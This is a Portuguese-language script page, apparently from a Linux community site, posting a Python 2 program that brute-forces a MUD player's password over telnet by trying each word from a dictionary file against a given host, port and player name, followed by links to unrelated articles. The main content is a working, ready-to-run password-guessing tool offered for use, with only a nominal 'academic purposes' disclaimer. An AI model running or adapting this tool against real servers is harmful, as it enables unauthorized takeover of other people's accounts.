Brute Force para MUD
Publicado por Karl Phillip 14/07/2004
[ Hits: 10.601 ]
Programa do tipo forca bruta para MUDs, escrito em Python por mim.
Tenta descobrir a senha de um jogador atraves de um dicionario de palavras, passando como parametro o Host e a Porta em que o jogo esta rodando.
Uso: ./mudbf.py end.do-mud.com 3000 JOGADOR dic_palavras.txt
Meus agradecimentos a <Aloysio de Paiva Figueiredo> pelo incentivo e muitas vezes suporte.
#!/usr/bin/python ######################################################################################### ### # ### This is a <Brute Force> program for MUD. # ### It was design fo academic purposes only. ***USE IT AT OWN RISC*** # ### Written in Python by: Karl Phillip # ### website: www.maxphil.cjb.net # ### em@il: max-phil@bol.com.br # ### Karl Phillip # ######################################################################################### import sys, string from telnetlib import Telnet try: host_name = sys.argv[1] port = sys.argv[2] ptarget = sys.argv[3] fname = sys.argv[4] except IndexError: print ">> Usage: ./mudbf <host> <port> <playerTARGET> <passwdFILE)\n" sys.exit(1) try: arq = open(fname) arq.close() except IOError: print ">> Password file does not exist!\n" sys.exit(1) print "\n<PytHoN programmed/> _brute_force4MUD_" print "" print " http://www.maxphil.cjb.net" print " by: Karl Phillip \n" print " <Target>: %s" % host_name print " <Port>: %s" % port print " <Player>: %s\n" % ptarget print ">> Trying passwords.. (this could take a few minutes)\n" arq = open(fname) login_sucess = "*** PRESS RETURN:" login_new ="Did I get that righ" numtries = 0 looping = False while not looping: for line in arq.readlines(): passwd = line numtries += 1 vict = Telnet(host_name, port) vict.write(ptarget+"\n") vict.write(str(passwd)+"\n") response = vict.read_until("Wrong password.", 12) if string.count(response, login_new): print "\n=========================================" print " *PLAYER NOT FOUND* in this MUD!" print "=========================================\n" arq.close() vict.close() sys.exit(1) elif string.count(response, login_sucess): print "\n <Passwords tried> %d" % int(numtries) print "\n*User*: %s" % ptarget print "*Password*: %s" % passwd vict.close() sys.exit(1) else: #print "Trying passwd: %s" % passwd vict.close() vict.close() looping = True arq.close() vict.close() print "\n <Passwords tried> %d" % int(numtries) print "\n=========================================" print " *NO PASSWORD* was found in that file!" print "=========================================\n"
DSearch - (Dir Search): script python para descobrir diretórios de servidores.
Krypt - Função de criptografia por chave de qualquer tamanho
Mkpass - Função para gerar senhas aleatórias
Hash Checker - Calcule o Hash dos seus Arquivos para verficação de integridade.
Melhorando o tempo de boot do Fedora e outras distribuições
Como instalar as extensões Dash To Dock e Hide Top Bar no Gnome 45/46
E a guerra contra bots continua
Tradução do artigo do filósofo Gottfried Wilhelm Leibniz sobre o sistema binário
Conheça o firewall OpenGFW, uma implementação do (Great Firewall of China).
Instalando o FreeOffice no LMDE 6
Anki: Remover Tags de Estilo HTML de Todas as Cartas
Colocando uma opção de redimensionamento de imagem no menu de contexto do KDE
Não consigo acessar os modos de desempenho (6)
Debian Bookworm para a versão beta Debian 13 Trixie (4)
Reinstalei o Debian 12 e a particao /home foi formatada: recuperando s... (0)
[Shell Script] Script para desinstalar pacotes desnecessários no OpenSuse
[Shell Script] Script para criar certificados de forma automatizada no OpenVpn
[Shell Script] Conversor de vídeo com opção de legenda
[C/C++] BRT - Bulk Renaming Tool
[Shell Script] Criação de Usuarios , Grupo e instalação do servidor de arquivos samba